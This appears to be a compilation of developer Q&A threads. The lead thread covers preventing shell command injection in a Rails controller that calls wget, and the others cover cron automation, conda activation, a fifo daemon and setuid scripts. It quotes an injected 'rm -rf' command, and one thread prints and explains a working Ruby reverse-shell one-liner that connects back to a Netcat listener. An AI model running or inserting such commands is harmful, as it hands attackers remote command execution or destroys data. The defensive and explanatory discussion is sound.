Prevent injection via URL input - ruby-on-rails

In my Rails controller, I take a URL that the user inputs and run the wget system command on it:
system("wget #{url}")
I'm afraid that the user might put in something like www.google.com && rm -rf ., which would make the controller execute the command
system("wget www.google.com && rm -rf .")
which deletes everything. How should I protect against this kind of attack? I'm not sure what else the user could put in to harm my system.

Per this thread:
You can avoid shell expansion by passing arguments to the script individually:
system("/bin/wget", params[:url])
Per the documentation on Kernel#system, this form does not invoke a shell. Constructs like && are shell constructs, so if you use this form, the param will be passed to /bin/wget literally, as a single argument.
That said, still be suspicious of input, sanitize where possible, and if feasible, run it as a non-privileged (or better yet, jailed) user.
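For instance, a minimal sketch of that advice in a controller action (the URI check and the "--" guard are extra precautions I'm layering on, not requirements of Kernel#system):
require "uri"

def fetch
  # Reject anything that isn't a well-formed http(s) URL before it
  # goes anywhere near a command line.
  parsed = URI.parse(params[:url])
  return head :unprocessable_entity unless parsed.is_a?(URI::HTTP)

  # Multi-argument form: no shell is involved, so && ; | have no
  # special meaning. The "--" tells wget to stop parsing options,
  # so the URL can't be smuggled in as a flag such as -O.
  system("/bin/wget", "--", parsed.to_s)
rescue URI::InvalidURIError
  head :unprocessable_entity
end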

Joining commands together with && (or ;, or |) is a shell feature, not something that wget itself understands. If you're using a function that passes a command line to a shell (such as the system() function in many languages), you're at risk. If you execute the wget program directly (rather than executing a shell and giving it a command line), you won't be at risk of that particular attack.
However, the attacker could still do other things, like abuse wget's -O option to overwrite files. You'd be better off not using wget at all — if your goal is to download a file, why not just use an HTTP library to do it directly in your own program's code?

If all you want is to retrieve the content of the URL, it is better to avoid the use of system (or any other means of running a command on the server) entirely.
You can use an HTTP client such as HTTParty to fetch the URL content:
response = HTTParty.get(url)
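A slightly more defensive version of the same idea might look like this (a sketch: the scheme check and the ten-second timeout are my own additions, not anything HTTParty requires):
require "httparty"
require "uri"

# Validate the scheme up front and bound how long the request may take.
parsed = URI.parse(url)
raise ArgumentError, "only http(s) URLs allowed" unless parsed.is_a?(URI::HTTP)

response = HTTParty.get(parsed.to_s, timeout: 10)
puts response.code  # HTTP status
puts response.body  # the fetched content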

Related

Script to automate timeshift backup and azuracast update

I'm running an Azuracast docker instance on Linode and want to find a way to automate my updates. Right now my routine is: when I notice in the Azuracast web panel that there are updates, I run timeshift to create a backup using the following command
timeshift --create --comment "azuracast update"
And then I use the following to update azuracast
cd /var/azuracast/
./docker.sh update-self
./docker.sh update
Then it asks me to ensure the azuracast installation is backed up before updating, to which I usually just press Enter.
After that is completed, it asks me if I want to clean up all stopped docker containers and images to save space, which I usually say no to.
What I’m wondering is if there is a way to create a bash script, or python or something to automate all of this, and then have it run on a schedule?
Sure, you can write a shell script to execute these commands and then run it on a schedule using crontab(5).
For example your script might look like:
#!/bin/sh
# Backup azuracast and restart docker container
timeshift --create --comment "azuracast update" && \
cd /var/azuracast/ && \
./docker.sh update-self && \
(yes | ./docker.sh update)
It sounds like this docker.sh program takes some user inputs. See if there are options you can pass to it that will allow you to run it non-interactively. (Seems there isn't, see edit.)
To set up your cron job, you can put the script in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly. Or, if you need more control, you can get started configuring a cron job with crontab -e. Better explanation.
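For example, a weekly entry in root's crontab (timeshift normally needs root) might look like the following; the script path, schedule, and log file are placeholders:
# min hour day-of-month month day-of-week command
0 3 * * 0 /usr/local/bin/azuracast-update.sh >> /var/log/azuracast-update.log 2>&1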
EDIT: Assuming this is the script you're using, it doesn't seem to have a way to run update non-interactively. Fear not though, there's a program for this: yes(1). This will answer yes to both of the questions, but honestly running docker system prune -f is probably a good idea. If you really want to answer no to that, you could replace yes with printf 'y\nn\n' to answer yes to the first question and no to the second.
Also note that there's at least one other y/n question it could ask you, which you probably want to answer yes to.
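Putting it together, the non-interactive update step from the script above would then be something like this (untested sketch, following the yes-then-no example):
printf 'y\nn\n' | ./docker.sh update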

Ruby one-liner breakdown?

I'm new to Ruby and trying to better understand this reverse shell one-liner designed to connect back to a Netcat listener.
Can someone try breaking the command down and explaining what some of the code actually does? For example, I know "TCPSocket.new" creates the new TCP socket, but what's "cmd=c.gets", "IO.popen", "|io|c.print io.read", etc. And what is the purpose of the while loop?
ruby -rsocket -e "c=TCPSocket.new('<IP Address>','<Port>');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
OK, let's break this one down.
ruby
runs the ruby interpreter, you likely knew that part
-rsocket
does the equivalent of require "socket" (r for require)
-e "some string"
run some string as a ruby script (e for execute)
while(cmd=c.gets)
is saying "while gets (get string up to and including the next newline) returns something from the connection c, i.e. while there's data coming in, assign it to cmd and..
IO.popen(cmd,'r'){|io|c.print io.read}
.. run cmd as a shell command, read the output, and print it back onto the connection c.
So, effectively, receive a command (like ls . or rm -rf /) over the network, read it in, run it, take the output, and send it back. Keep doing so until the other side stops sending commands.
Because gets will block and wait for the next line to come in, this one-liner will sit there waiting until the connection is closed.
You probably don't want to let other people send commands down that connection, since it'll run whatever they send directly on your computer, though that's presumably what you mean by "reverse shell".
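If you want to play with the IO.popen part in isolation, here's a harmless local example:
# Run a command, capture everything it printed, and return it as a string.
# With a block, IO.popen yields the subprocess's stdout as an IO object
# and returns the block's value.
output = IO.popen("echo hello", "r") { |io| io.read }
puts output  # => hello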

Conda: what happens when you activate an environment?

How does running source activate <env-name> update the $PATH variable? I've been looking in the CONDA-INSTALLATION/bin/activate script and do not understand how conda updates my $PATH variable to include the bin directory for the recently activated environment. Nowhere can I find the code that conda uses to prepend to my $PATH variable.
Disclaimer: I am not a conda developer, and I'm not a Bash expert. The following explanation is based on me tracing through the code, and I hope I got it all right. Also, all of the links below are permalinks to the master commit at the time of writing this answer (7cb5f66). Behavior/lines may change in future commits. Beware: Deep rabbit hole ahead!
Note that this explanation is for the command source activate env-name, but in conda>=4.4, the recommended way to activate an environment is conda activate env-name. If you use conda activate env-name, pick up the explanation around the part where we get into the cli.main function.
For conda >=4.4,<4.5, looking at CONDA_INST_DIR/bin/activate, we find on the second to last and last lines (GitHub link):
. "$_CONDA_ROOT/etc/profile.d/conda.sh" || return $?
_conda_activate "$#"
The first line sources the script conda.sh in the $_CONDA_ROOT/etc/profile.d directory, and that script defines the _conda_activate bash function, to which we pass "$@", i.e. all of the arguments that we passed to the activate script.
Taking the next step down the rabbit hole, we look at $_CONDA_ROOT/etc/profile.d/conda.sh and find (GitHub link):
_conda_activate() {
    # Some code removed...
    local ask_conda
    ask_conda="$(PS1="$PS1" $_CONDA_EXE shell.posix activate "$@")" || return $?
    eval "$ask_conda"
    _conda_hashr
}
The key is that line ask_conda=..., and particularly $_CONDA_EXE shell.posix activate "$@". Here, we are running the conda executable with the arguments shell.posix, activate, and then the rest of the arguments that got passed to this function (i.e., the environment name that we want to activate).
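As an aside, you can run that same command yourself to see what conda hands back to the shell. The environment name here is hypothetical, and the exact form of the output varies between conda versions, but it ultimately amounts to the shell code that sets PATH, CONDA_PREFIX, and friends:
$ conda shell.posix activate myenv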
Another step into the rabbit hole... From here, the conda executable calls the cli.main function and since the first argument starts with shell., it imports the main function from conda.activate. This function creates an instance of the Activator class (defined in the same file) and runs the execute method.
The execute method processes the arguments and stores the passed environment name into an instance variable, then decides that the activate command has been passed, so it runs the activate method.
Another step into the rabbit hole... The activate method calls the build_activate method, which calls another function to process the environment name and find the environment prefix (i.e., which folder the environment is in). The build_activate method then adds the prefix to the PATH via the _add_prefix_to_path method and finally returns a dictionary of commands that need to be run to "activate" the environment.
And another step deeper... The dictionary returned from the build_activate method gets processed into shell commands by the _yield_commands method, which are passed into the _finalize method. The activate method returns the value from running the _finalize method which returns the name of a temp file. The temp file has the commands required to set all of the appropriate environment variables.
Now, stepping back out, in the activate.main function, the return value of the execute method (i.e., the name of the temp file) is printed to stdout. This temp file name gets stored in the Bash variable ask_conda back in the _conda_activate Bash function, and finally, the temp file is executed by the eval Bash function.
Phew! I hope I got everything right. As I said, I'm not a conda developer, and far from a Bash expert, so please excuse any explanation shortcuts I took that aren't 100% correct. Just leave a comment, I'll be happy to fix it!
I should also note that the recommended method to activate environments in conda >=4.4 is conda activate env-name, which is one of the reasons this is so convoluted - the activation is mostly handled in Python now, whereas (I think) previously it was more-or-less handled directly in Bash/CMD.

Optimizing Rails loading for maintenance scripts

I wrote a script that does maintenance tasks for a Rails application. The script uses a class that uses models defined in the application. Just as an example, let's say the application defines a model User, and my class (used within the script) sends messages to it, like User.find id.
I am looking for ways to optimize this script, because right now it has to load the application environment: require '../config/environment'. This takes ~15 seconds.
If the script didn't use the application codebase to do its job, I could have replaced the model abstractions with raw SQL. But unfortunately I can't do that, because I would have to repeat code in the script that is already present in the codebase. Not only would this violate the DRY principle and require a lot of work; the script would also be hard to maintain if the model methods I am using change.
I would like to hear ideas how to approach this problem. The script is not run from the application itself, but from the shell (with Capistrano for instance).
I hope I've described the problem clear enough. Thank you.
Could you write a little daemon that sits blocked in a read on a pipe (or named fifo, or unix domain socket, or, with more complexity, a tcp port) and accepts 'commands' that would be run on your database?
#!/usr/bin/ruby
require '../config/environment'

# Block reading the fifo forever; each line written to it is a command.
while true do
  File.open("/tmp/fifo", "r") do |f|
    f.each_line do |line|
      case line
      when "cleanup" then puts "clean!"
      when "publish" then puts "published!"
      else puts "invalid command, ignoring"
      end
    end
  end
end
You could start this thing up with vixie cron's @reboot specifier (see the example at the end of this answer), or you could run it via capistrano commands, or run it out of init or init scripts. Then you write your capistrano rules (that you have now) to simply echo commands into the fifo:
First,
mkfifo /tmp/fifo
In one terminal:
$ ./env.rb
In another terminal:
$ echo -n "cleanup" > /tmp/fifo
$ echo -n "publish" > /tmp/fifo
$ echo -n "go away" > /tmp/fifo
The output in the first terminal looks like this:
clean!
published!
invalid command, ignoring
You could make the matching as friendly (perhaps allow plain echo, rather than require echo -n as my example does) or unfriendly as you want. And the commands that get run can of course call into your model files to do their work.
Please make sure you choose a good location for your fifo -- /tmp/ is probably a bad place, as many distributions clear it on reboot. Also make sure you set the fifo owner and permission (chown and chmod) appropriately for your application -- you might not want to allow your Firefox's flash plugin to write to this file and command your database.
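If you do start it from cron, a hypothetical root crontab entry using the @reboot specifier (the script path is a placeholder) would be:
@reboot /path/to/env.rb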

Ruby on Rails- how to run a bash script as root?

What I want to do is use 'button_to' & friends to start different scripts on a Linux server. Not all scripts will need to run as root, but some will, since they'll be running "apt-get dist-upgrade" and such.
The PassengerDefaultUser is set to www-data in apache2.conf
I have already tried running scripts from the controller that do little things like writing to text files, etc, just so that I know that I am having Rails execute the script correctly. (in other words, I know how to run a script from the controller) But I cannot figure out how to run a script that requires root access. Can anyone give me a lead?
A note on security: Thanks for all the warnings against hacking that were given. You don't need to lose any sleep, though, because A) the webapp is not accessible from the public internet, it will only be on private intranets, B) the app is password protected, and C) the user will not be able to supply custom input, only make selections from a form that will be passed as variables to the script. However, just because I say this does not mean that I am disregarding your recommendations for security; I will be considering them very carefully in my design.
You should be using the setuid bit to achieve this functionality without sudo, but you shouldn't be running Bash scripts. Setuid is much more secure than sudo here. With either sudo or setuid you are running a program as root, but only setuid (with the help of certain languages) offers some added security measures.
Essentially, you'll be using scripts that are temporarily allowed to run as their owner, instead of as the user that invoked them. Ruby and Perl can detect when a script is run as a different user than the caller and enforce security measures to protect against unsafe calls. This is called taint mode. Bash has no taint mode at all.
Taint mode essentially works by declaring all input from an outside source unsafe for use when passed to a system call.
Setting it up:
Use chown to make root the owner of the script you want to run, then use chmod to set its permissions to 4755. Do it in that order, since chown typically clears the setuid bit:
$ chown root script.rb
$ chmod 4755 script.rb
Then just run the script as you normally would. The setuid bit kicks in and runs the script as if it were run by root. This is the safest way to temporarily elevate privileges.
See Ruby's documentation on safe levels and taint to understand Ruby's sanitation requirements for protecting against tainted input causing harm, or the perlsec FAQ to learn how the same thing is done in Perl.
Again: if you're dead set on running scripts as root from an automated system, do not use Bash! Use Ruby or Perl instead. Taint mode forces you to take security seriously and can head off many unnecessary problems down the line.
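For illustration, here's a minimal sketch of what taint checking looked like in older Rubies; the taint mechanism was deprecated in Ruby 2.7 and removed in later releases, so treat this as historical:
#!/usr/bin/ruby
# Historical sketch: under $SAFE >= 1, passing tainted (externally
# supplied) data to a system call raises SecurityError.
$SAFE = 1

dir = ARGV[0].to_s   # data from the outside world arrives tainted
puts dir.tainted?    # => true
system("ls #{dir}")  # raises SecurityError instead of reaching a shell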
